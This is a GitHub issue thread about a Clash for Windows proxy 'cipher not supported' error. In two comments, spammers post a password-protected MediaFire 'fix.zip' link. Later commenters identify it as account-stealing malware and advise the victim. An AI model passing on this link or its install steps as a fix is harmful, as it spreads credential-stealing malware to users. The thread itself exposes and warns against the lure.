### ISSUE TITLE
proxy 27: ss free.2we************:26141 initialize error: cipher not supported

### ISSUE THREAD

**Issue by YjZhang-sudo** [Z-Siqi/Clash-for-Windows_Chinese#178]
### 催更

![image](https://github.com/user-attachments/assets/53007759-c320-4b79-b4ff-c68a2f42a987)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YjZhang-sudo** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

after I unzip, only show 'x86_64-w64-ranlib.exe' and 'libssp-0.dll', x86_64-w64-ranlib.exe can not run with 0 kb. Could you show detail?

**Comment by MahouShoujoMivutilde** [comment]
Do **NOT** run it.

It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere, like happened to this person.

There are a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)

**Comment by YjZhang-sudo** [comment]
How can I completely delete it？

**Comment by Z-Siqi** [comment]
> How can I completely delete it？
> […](#)
> Sent from my iPhone
> On Aug 28, 2024, at 3:54 AM, MahouShoujoMivutilde ***@***.***> wrote: It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere, like happened to this person.

Reinstall a new Windows system or try to use security program to scan threats. And REMEMBER, never run any unknown program on YOUR physical machine. If you want to run a unknown program, please run it in a virtual machine or sandbox

**Comment by Z-Siqi** [comment]
Duplicate: #177
